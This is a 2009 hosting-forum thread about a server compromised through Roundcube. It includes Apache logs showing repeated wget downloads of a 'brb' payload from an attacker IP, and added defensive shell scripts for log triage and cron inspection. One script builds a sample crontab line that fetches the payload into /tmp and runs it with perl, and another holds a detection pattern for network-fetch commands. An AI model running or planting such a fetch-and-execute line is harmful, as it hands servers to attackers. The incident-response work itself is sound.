Httpd Restart And Roundcube exploit

durjoy (Verified User, joined Nov 20, 2007, 13 messages)
Life is being tough with the Roundcube exploit. These exploits are doing my head in; it started from this Monday. My hosting company sent me more than 20 abuse reports/emails from other network owners: there were brute-force attack attempts from my IP. I asked the hosting company for help; they said they will charge 100 USD per hour.

I had a look at the httpd error log in DirectAdmin. Surprisingly there are so many error messages, and signs of downloading a remote file..
Code:

[Sun Apr 12 05:01:36 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/nonexisten****
[Sun Apr 12 05:01:36 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/nonexisten****
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/mail
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/mail
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/bin
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/bin
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/rc
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/rc
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
--05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... --05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... --05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30987 (30K) [text/plain]
Saving to: `brb.6'

0K ..200 OK
Length: 30987 (30K) [text/plain]
Saving to: `brb.7'

0K ..200 OK
Length: 30987 (30K) [text/plain]
Saving to: `brb.8'

0K .......... ......... ......... .......... .......... ............... ................. 100% 76.1K=0.4s

05:01:38 (76.1 KB/s) - `brb.6' saved [30987/30987]

.... 100% 75.8K=0.4s

05:01:38 (75.8 KB/s) - `brb.7' saved [30987/30987]

.. 100% 76.5K=0.4s

05:01:38 (76.5 KB/s) - `brb.8' saved [30987/30987]

[Sun Apr 12 09:04:54 2009] [error] [client 65.55.106.160] File does not exist: /var/www/html/sv
[Sun Apr 12 09:04:54 2009] [error] [client 65.55.106.160] File does not exist: /var/www/html/404.shtml
[Sun Apr 12 10:01:25 2009] [error] [client 60.190.133.90] Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Sun Apr 12 10:01:25 2009] [error] [client 60.190.133.90] File does not exist: /var/www/html/400.shtml
[Sun Apr 12 10:01:25 2009] [error] [client 60.190.133.90] Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Sun Apr 12 10:01:25 2009] [error] [client 60.190.133.90] File does not exist: /home/durjoy/domains/sharedip/400.shtml
[Sun Apr 12 10:54:27 2009] [error] [client 92.12.49.96] Invalid method in request w.mybanglaspace.com/public/gallery/main/display_1/mode_1/pagesize_12/field_/page_17/
[Sun Apr 12 10:54:27 2009] [error] [client 92.12.49.96] File does not exist: /var/www/html/501.shtml
[Sun Apr 12 16:11:54 2009] [error] [client 213.89.67.79] Invalid method in request ace.com/nasrin
[Sun Apr 12 16:11:54 2009] [error] [client 213.89.67.79] File does not exist: /var/www/html/501.shtml
[Sun Apr 12 18:48:02 2009] [notice] caught SIGTERM, shutting down
[Sun Apr 12 18:48:04 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Sun Apr 12 18:48:04 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Sun Apr 12 18:48:04 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Sun Apr 12 18:48:04 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)

The last 4 days I have spent all of my time in this forum and googling for solutions. Finally I have uninstalled Roundcube, secured the SSH port and changed the tmp folder permissions. I also installed ClamAV and deleted all the infected mails from the maildir and IMAP folders. Now my system is clean; I have updated ClamAV and scanned again and again, and there is nothing.

Everything was running smoothly. But once again,

this morning httpd went offline once again.

Every morning, UK time around 6 am, NYC time 1 PM, httpd goes offline. It looks like the exploit still remains in the server, or it has set up a cron job to run it every morning. This is so scary.. my website users are already fed up with the blank page.


I saw so many people in this forum experiencing the same error; please help if you were able to overcome this error.

thanks



Code:
[Thu Apr 16 08:44:28 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 08:44:28 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 08:44:29 2009] [notice] Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 configured -- resuming normal operations
[Thu Apr 16 09:20:41 2009] [notice] caught SIGTERM, shutting down
[Thu Apr 16 09:21:54 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:54 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:54 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:54 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 09:21:54 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 09:21:54 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 09:21:54 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Thu Apr 16 09:21:55 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:55 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:55 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:21:55 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 09:21:55 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 09:21:55 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 09:21:56 2009] [notice] Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 configured -- resuming normal operations
[Thu Apr 16 10:49:04 2009] [warn] (101)Network is unreachable: connect to listener on [::]:443
[Thu Apr 16 10:49:04 2009] [warn] (101)Network is unreachable: connect to listener on [::]:443
[Thu Apr 16 10:49:04 2009] [notice] caught SIGTERM, shutting down
[Thu Apr 16 10:50:17 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:17 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:17 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:17 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 10:50:17 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 10:50:17 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 10:50:17 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Thu Apr 16 10:50:18 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:18 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:18 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 10:50:18 2009] [warn] Init: SSL server IP/port conflict: www.ycwb.org:443 (/usr/local/directadmin/data/users/kafil/httpd.conf:192) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 10:50:18 2009] [warn] Init: SSL server IP/port conflict: localhost:443 (/etc/httpd/conf/extra/httpd-vhosts.conf:38) vs. www.sharun.com:443 (/usr/local/directadmin/data/users/sharun/httpd.conf:48)
[Thu Apr 16 10:50:18 2009] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!!
[Thu Apr 16 10:50:19 2009] [notice] Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 configured -- resuming normal operations
[Thu Apr 16 11:19:25 2009] [error] [client 71.127.151.251] File does not exist: /var/www/html/400.shtml
 
I have updated it and later on I have decided to delete it, because I don't need this kind of vulnerable email client anymore. So I have deleted the whole Roundcube folder. Still httpd is getting restarted; it looks like the exploit has created a cron job to restart it every day.
 
Last edited:
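An added example, not code from the post above, showing how to pull the indicators out of an error_log like this one with nothing but awk and grep. It assumes the log is in Apache 2.2's default format and that the wget lines got there the usual way: a script run under the web server spawned wget, and the child inherited Apache's stderr. The sample log in the script is constructed from the lines posted above, not the real file. Two things worth reading off the real log: the 404.shtml, 400.shtml and 501.shtml misses are only Apache failing to find the custom error pages its ErrorDocument directives point at, so they are noise; and wget only writes `brb.6` when brb and brb.1 through brb.5 already exist in its working directory, so the fetch had already run at least six times before the one in the log.

```shell
#!/bin/sh
# Added example, not code from the thread: extract compromise indicators from an
# Apache error_log that has wget output mixed into it. A script run under the
# web server that spawns wget hands the child Apache's stderr, so wget's progress
# output lands in error_log between the normal "[error] [client ...]" lines.
set -eu

# Constructed sample, modelled on the lines in the post (not the real log).
SAMPLE=$(cat <<'EOF'
[Sun Apr 12 05:01:36 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/404.shtml
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/mail
[Sun Apr 12 05:01:37 2009] [error] [client 217.79.182.58] File does not exist: /home/durjoy/domains/sharedip/rc
--05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... --05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30987 (30K) [text/plain]
Saving to: `brb.6'
05:01:38 (76.1 KB/s) - `brb.6' saved [30987/30987]
05:01:38 (75.8 KB/s) - `brb.7' saved [30987/30987]
[Sun Apr 12 09:04:54 2009] [error] [client 65.55.106.160] File does not exist: /var/www/html/sv
EOF
)

# 1. Every URL wget was told to fetch. wget prints "--HH:MM:SS--  URL" when it
#    starts; scan every field so interleaved output from parallel wgets still parses.
fetched_urls() {
    awk '{ for (i = 1; i < NF; i++)
             if ($i ~ /^--[0-9][0-9]:[0-9][0-9]:[0-9][0-9]--$/ && $(i + 1) ~ /^[a-z]+:\/\//)
               print $(i + 1) }' "$@" | sort -u
}

# 2. Local names the payload was saved under, with its size. wget appends .N when
#    the name already exists, so "brb.6" means brb through brb.5 were already
#    there: the fetch had run at least six times before this one.
saved_files() {
    awk -v bt='`' -v q="'" '/ saved \[/ {
        s = index($0, bt); e = index($0, q)
        if (s && e > s) {
            name = substr($0, s + 1, e - s - 1)
            size = $0; sub(/.*saved \[/, "", size); sub(/\/.*/, "", size)
            print name, size
        } }' "$@"
}

# 3. Clients probing for files that are not there, busiest first. A burst of
#    misses for /mail, /rc, /bin, ... from one IP is a scanner hunting for a
#    webmail install, not a broken link.
probe_ips() {
    awk '/File does not exist/ {
           for (i = 1; i < NF; i++)
             if ($i == "[client") { ip = $(i + 1); sub(/\]$/, "", ip); hits[ip]++ } }
         END { for (ip in hits) print hits[ip], ip }' "$@" | sort -rn
}

report() {
    echo "== remote fetches";       fetched_urls "$@"
    echo "== payloads saved";       saved_files "$@"
    echo "== 404 probes by client"; probe_ips "$@"
}

# Usage: sh triage_errlog.sh /var/log/httpd/error_log   (path is an assumption;
# DirectAdmin also keeps per-domain logs under /var/log/httpd/domains/, also an
# assumption). With no argument the constructed sample is used.
if [ $# -gt 0 ]; then
    report "$@"
else
    tmp=$(mktemp); printf '%s\n' "$SAMPLE" > "$tmp"; report "$tmp"; rm -f "$tmp"
fi
```

Run it against every error_log on the box, including the per-domain ones, then look for the saved names in the web root and in /tmp: a file that the web server's user wrote there, with the size wget reported, is the payload, and its timestamp tells you how long this has been going on.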
When DirectAdmin does its tallying each night, it automatically restarts Apache after.
 
Missing error messages aren't a problem.
Code:
Connecting to 217.79.182.58:80... --05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... --05:01:37-- http://217.79.182.58/brb
Connecting to 217.79.182.58:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Hopefully you've resolved it; brb is an exploit.

Jeff
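An added example, not Jeff's and not DirectAdmin's code, that works through his point before anyone concludes a cron job is restarting httpd: list when httpd actually got its SIGTERMs, then grep the cron sources for entries that fetch from the network or run out of a world-writable directory. The directadmin_cron line in the sample is an assumption about what DirectAdmin's nightly tally entry looks like; the apache crontab line is constructed to show what a planted entry looks like; /var/log/httpd/error_log and the user name apache are assumptions to adjust for the box.

```shell
#!/bin/sh
# Added example, not code from the thread or from DirectAdmin: separate a planted
# cron job from DirectAdmin's own nightly restart. Two checks: when httpd really
# got its SIGTERMs, and whether anything in cron fetches from the network or
# runs out of a world-writable directory.
set -eu

# Shutdown times from error_log: every orderly stop logs "caught SIGTERM".
# A restart that lines up with the tally schedule is expected; a second one at
# its own fixed time every morning is what a planted entry would produce.
restart_times() {
    awk '/caught SIGTERM/ { t = $0; sub(/^\[/, "", t); sub(/\].*/, "", t); print t }' "$@"
}

# Cron lines that look attacker-planted: a network fetch, anything under /tmp,
# /var/tmp or /dev/shm, the payload name from the log, or a decoded blob.
# Comment lines are dropped. Output is file:line:entry.
flag_cron_entries() {
    grep -HnE 'wget |curl |fetch |(/tmp|/var/tmp|/dev/shm)([/; ]|$)|/brb|\.brb|base64 -d' "$@" 2>/dev/null \
        | grep -vE '^[^:]*:[0-9]+:[[:space:]]*#' || true
}

# Constructed samples, not from the server. directadmin_cron is an assumption
# about what DirectAdmin's tally entry looks like; "apache" is the kind of line a
# web shell drops into the web user's crontab to re-fetch its payload each morning.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
cat > "$SAMPLE_DIR/directadmin_cron" <<'EOF'
# nightly stats tally; DirectAdmin restarts Apache when it finishes
10 0 * * * root echo 'action=tally&value=all' >> /usr/local/directadmin/data/task.queue
EOF
cat > "$SAMPLE_DIR/apache" <<'EOF'
0 6 * * * cd /tmp; wget -q http://217.79.182.58/brb -O .brb; perl .brb >/dev/null 2>&1
EOF
SAMPLE_ERRLOG=$(cat <<'EOF'
[Sun Apr 12 18:48:02 2009] [notice] caught SIGTERM, shutting down
[Sun Apr 12 18:48:04 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
[Thu Apr 16 09:20:41 2009] [notice] caught SIGTERM, shutting down
EOF
)

echo "== httpd shutdowns";         printf '%s\n' "$SAMPLE_ERRLOG" | restart_times
echo "== suspicious cron entries"; flag_cron_entries "$SAMPLE_DIR"/*

# On the live box, as root (paths and the web user's name are assumptions):
#   restart_times /var/log/httpd/error_log
#   flag_cron_entries /etc/crontab /etc/cron.d/* /var/spool/cron/* /etc/cron.daily/*
#   crontab -l -u apache              # the web server's user should have no crontab at all
#   ps -u apache -o pid,lstart,args   # and nothing long-running that started at 6 am
```

If flag_cron_entries on the live box prints nothing and the only shutdown each night matches the tally time, the nightly blank page is DirectAdmin's own restart, not the attacker's. A real planted entry is also one more reason to rebuild rather than keep cleaning: whatever could write a crontab for the web user could write anywhere that user can.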
 